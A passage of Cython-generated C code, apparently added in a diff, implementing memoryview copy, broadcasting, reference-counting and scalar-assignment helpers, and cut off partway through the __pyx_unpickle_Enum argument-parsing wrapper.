&dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + __pyx_t_2 = __pyx_slices_overlap((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + if (__pyx_t_2) { + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + __pyx_t_2 = (!__pyx_memviewslice_is_contig(__pyx_v_src, __pyx_v_order, __pyx_v_ndim)); + if (__pyx_t_2) { + + /* "View.MemoryView":1302 + * + * if not slice_is_contig(src, order, ndim): + * order = get_best_order(&dst, ndim) # <<<<<<<<<<<<<< + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim); + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + } + + /* "View.MemoryView":1304 + * order = get_best_order(&dst, ndim) + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) # <<<<<<<<<<<<<< + * src = tmp + * + */ + __pyx_t_7 = __pyx_memoryview_copy_data_to_temp((&__pyx_v_src), (&__pyx_v_tmp), __pyx_v_order, __pyx_v_ndim); if (unlikely(__pyx_t_7 == ((void *)NULL))) __PYX_ERR(1, 1304, __pyx_L1_error) + __pyx_v_tmpdata = __pyx_t_7; + + /* "View.MemoryView":1305 + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + * src = tmp # <<<<<<<<<<<<<< + * + * if not broadcasting: + */ + __pyx_v_src = __pyx_v_tmp; + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (!__pyx_v_broadcasting); + if (__pyx_t_2) { + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'C', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1311 + * + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) # <<<<<<<<<<<<<< + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'C', __pyx_v_ndim); + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + goto __pyx_L12; + } + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'F', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1313 + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) # <<<<<<<<<<<<<< + * + * if direct_copy: + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'F', __pyx_v_ndim); + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + } + __pyx_L12:; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + if (__pyx_v_direct_copy) { + + /* "View.MemoryView":1317 + * if direct_copy: + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1318 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + */ + (void)(memcpy(__pyx_v_dst.data, __pyx_v_src.data, __pyx_memoryview_slice_get_size((&__pyx_v_src), __pyx_v_ndim))); + + /* "View.MemoryView":1319 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * free(tmpdata) + * return 0 + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1320 + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1321 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * if order == 'F' == get_best_order(&dst, ndim): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (__pyx_v_order == 'F'); + if (__pyx_t_2) { + __pyx_t_2 = ('F' == __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim)); + } + if (__pyx_t_2) { + + /* "View.MemoryView":1326 + * + * + * transpose_memslice(&src) # <<<<<<<<<<<<<< + * transpose_memslice(&dst) + * + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_src)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1326, __pyx_L1_error) + + /* "View.MemoryView":1327 + * + * transpose_memslice(&src) + * transpose_memslice(&dst) # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_dst)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1327, __pyx_L1_error) + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1329 + * transpose_memslice(&dst) + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1330 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + */ + copy_strided_to_strided((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1331 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * free(tmpdata) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1333 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1334 + * + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_broadcast_leading') + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_contents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim, int __pyx_v_ndim_other) { + int __pyx_v_i; + int __pyx_v_offset; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + + /* "View.MemoryView":1341 + * int ndim_other) noexcept nogil: + * cdef int i + * cdef int offset = ndim_other - ndim # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_offset = (__pyx_v_ndim_other - __pyx_v_ndim); + + /* "View.MemoryView":1343 + * cdef int offset = ndim_other - ndim + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1344 + * + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] # <<<<<<<<<<<<<< + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + */ + (__pyx_v_mslice->shape[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->shape[__pyx_v_i]); + + /* "View.MemoryView":1345 + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] # <<<<<<<<<<<<<< + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + */ + (__pyx_v_mslice->strides[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1346 + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] # <<<<<<<<<<<<<< + * + * for i in range(offset): + */ + (__pyx_v_mslice->suboffsets[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->suboffsets[__pyx_v_i]); + } + + /* "View.MemoryView":1348 + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + * for i in range(offset): # <<<<<<<<<<<<<< + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + */ + __pyx_t_1 = __pyx_v_offset; + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1349 + * + * for i in range(offset): + * mslice.shape[i] = 1 # <<<<<<<<<<<<<< + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 + */ + (__pyx_v_mslice->shape[__pyx_v_i]) = 1; + + /* "View.MemoryView":1350 + * for i in range(offset): + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] # <<<<<<<<<<<<<< + * mslice.suboffsets[i] = -1 + * + */ + (__pyx_v_mslice->strides[__pyx_v_i]) = (__pyx_v_mslice->strides[0]); + + /* "View.MemoryView":1351 + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_mslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_dtype_is_object, int __pyx_v_ndim, int __pyx_v_inc) { + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + if (__pyx_v_dtype_is_object) { + + /* "View.MemoryView":1362 + * + * if dtype_is_object: + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + */ + __pyx_memoryview_refcount_objects_in_slice_with_gil(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + } + + /* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + __Pyx_RefNannyDeclarations + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("refcount_objects_in_slice_with_gil", 0); + + /* "View.MemoryView":1368 + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + * refcount_objects_in_slice(data, shape, strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, __pyx_v_shape, __pyx_v_strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif +} + +/* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + +static void __pyx_memoryview_refcount_objects_in_slice(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + __Pyx_RefNannySetupContext("refcount_objects_in_slice", 0); + + /* "View.MemoryView":1374 + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * + * for i in range(shape[0]): + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1376 + * cdef Py_ssize_t stride = strides[0] + * + * for i in range(shape[0]): # <<<<<<<<<<<<<< + * if ndim == 1: + * if inc: + */ + __pyx_t_1 = (__pyx_v_shape[0]); + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + __pyx_t_4 = (__pyx_v_ndim == 1); + if (__pyx_t_4) { + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + if (__pyx_v_inc) { + + /* "View.MemoryView":1379 + * if ndim == 1: + * if inc: + * Py_INCREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * Py_DECREF(( data)[0]) + */ + Py_INCREF((((PyObject **)__pyx_v_data)[0])); + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":1381 + * Py_INCREF(( data)[0]) + * else: + * Py_DECREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + */ + /*else*/ { + Py_DECREF((((PyObject **)__pyx_v_data)[0])); + } + __pyx_L6:; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":1383 + * Py_DECREF(( data)[0]) + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) # <<<<<<<<<<<<<< + * + * data += stride + */ + /*else*/ { + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_inc); + } + __pyx_L5:; + + /* "View.MemoryView":1385 + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + * + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item, int __pyx_v_dtype_is_object) { + + /* "View.MemoryView":1394 + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1395 + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) # <<<<<<<<<<<<<< + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1396 + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + +static void __pyx_memoryview__slice_assign_scalar(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_extent; + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + + /* "View.MemoryView":1404 + * size_t itemsize, void *item) noexcept nogil: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t extent = shape[0] + * + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1405 + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] + * cdef Py_ssize_t extent = shape[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_extent = (__pyx_v_shape[0]); + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1408 + * + * if ndim == 1: + * for i in range(extent): # <<<<<<<<<<<<<< + * memcpy(data, item, itemsize) + * data += stride + */ + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1409 + * if ndim == 1: + * for i in range(extent): + * memcpy(data, item, itemsize) # <<<<<<<<<<<<<< + * data += stride + * else: + */ + (void)(memcpy(__pyx_v_data, __pyx_v_item, __pyx_v_itemsize)); + + /* "View.MemoryView":1410 + * for i in range(extent): + * memcpy(data, item, itemsize) + * data += stride # <<<<<<<<<<<<<< + * else: + * for i in range(extent): + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1412 + * data += stride + * else: + * for i in range(extent): # <<<<<<<<<<<<<< + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride + */ + /*else*/ { + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1413 + * else: + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) # <<<<<<<<<<<<<< + * data += stride + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1414 + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + + /* function exit code */ +} + +/* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum = {"__pyx_unpickle_Enum", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, 